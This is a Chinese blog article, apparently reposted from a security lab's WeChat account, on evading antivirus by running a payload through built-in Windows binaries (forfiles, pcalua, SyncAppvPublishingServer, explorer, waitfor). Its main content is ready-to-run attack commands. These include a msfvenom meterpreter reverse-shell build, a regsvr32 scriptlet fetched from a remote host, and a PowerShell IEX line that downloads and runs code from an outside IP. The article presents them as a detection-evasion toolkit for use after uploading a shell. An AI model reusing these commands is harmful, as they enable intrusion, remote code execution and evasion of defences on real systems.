前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >免杀技巧-执行系统命令方式总结

免杀技巧-执行系统命令方式总结

作者头像
Gamma实验室
发布2020-12-23 10:07:04
1.5K0
发布2020-12-23 10:07:04
举报
文章被收录于专栏:Gamma安全实验室

“在渗透测试中,常常会遇到这种情况,上传一个shell上去,连上,却发现无法调用cmd.exe无法执行系统命令,这时候你往往想着,上传一个自己的cmd.exe上去,这是一套行云流水的操作,但把环境条件在变得苛刻一点,杀毒软件将监视二进制文件,例如cmd.exe,那么你会怎么做才能逃避检测?那么接下来就会介绍一些免杀思路。”

01

背景

Windows系统提供了多个二进制文件,可以使用它们执行任意命令。

在这,你是不是想到了什么?既然可以执行命令,那么它将帮助hacker们逃过检测,尤其是对cmd.exe监视的环境下。

当然这需要一些前提条件:未正确配置白名单规则(这里涵盖了文件名和路径),使得一些系统可执行文件能够执行。

接下来

让我们看看这些项免杀技术的闪光点!

02

正文

我们先用msfvenom生成一个木马程序:

代码语言:javascript
复制
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.73.136 lport=8888 -f exe -o hacker.exe

Msf监听端口8888

Forfiles:

首先,要说明的是,forfiles是Windows Server 2003内置的命令行文件,其它系统未必适用。不过,win2003以上的系统,包括win7、windows server 2008均适用哦。forfiles 是一个命令实用程序,可以选择多个文件并在它们上运行命令,它通常用于批处理作业中,但可能会被滥用以执行任意命令或可执行文件。

语法须知:

默认搜索掩码为*,也使用参数 / p和/ m在Windows目录System32 和掩码calc.exe 上执行搜索,/ c参数之后的所有内容都是实际执行的命令。

命令:

代码语言:javascript
复制
forfiles /p c:\windows\system32 /m calc.exe /c C:\tmp\hacker.exe

Msf开启会话:

毫无疑问的是,Hacker.exe 将是forfiles.exe子进程。

当然也可以用windows自带的“运行”来执行命令。

Pcalua:

进程兼容性助手是Windows实用程序,当它检测到存在兼容性问题的软件时就会运行。该实用程序位于“ C:\ Windows \ System32 ”中,并且可以使用“ -a”参数执行命令。

命令:

代码语言:javascript
复制
pcalua.exe -a C:\tmp\hacker.exe

Msf打开会话:

值得注意的是,hacker.exe将是一个新的父进程。

后面就不一一截图了,大家自行下去验证就欧克了

SyncAppvPublishingServer:

SyncAppvPublishingServer 为启动Microsoft应用程序虚拟化(App-V)发布刷新操作,在下面的示例中,将在powershell中执行, Start-Process cmdlet用于运行可执行文件。

命令:

代码语言:javascript
复制
SyncAppvPublishingServer.vbs "n; Start-Process C:\tmp\hacker.exe"

由于SyncAppvPublishingServer将执行双引号中包含的所有内容,因此还可以使用“ regsvr32 ”方法从远程位置执行恶意有效负载。

命令:

代码语言:javascript
复制
SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.73.136:8080/jnQl1FJ.sct scrobj.dll"

Explorer:

可以将explorer.exe 用作执行方法。执行的有效负载将在系统上创建一个进程,该进程将把explorer.exe作为父进程。

命令:

代码语言:javascript
复制
explorer.exe C:\tmp\hacker.exeexplorer.exe /root,"C:\tmp\hacker.exe"explorer.exe 0XAXSDD-Hacker, "C:\tmp\hacker.exe"

Waitfor:

waitfor是Microsoft二进制文件,用于通过发送信号来跨网络同步计算机,也可用于执行任意命令或下载有效载荷。

命令:

代码语言:javascript
复制
waitfor hacker && PowerShell IEX(new-object net.webclient).downloadstring('http://192.168.73.136:8080/shell');
waitfor /s 127.0.0.1 /si hacker

当然这里只总结了一些,也没总结完,但也值得学习与思考,希望能给你一个好的思路!

END

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-10-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Gamma安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档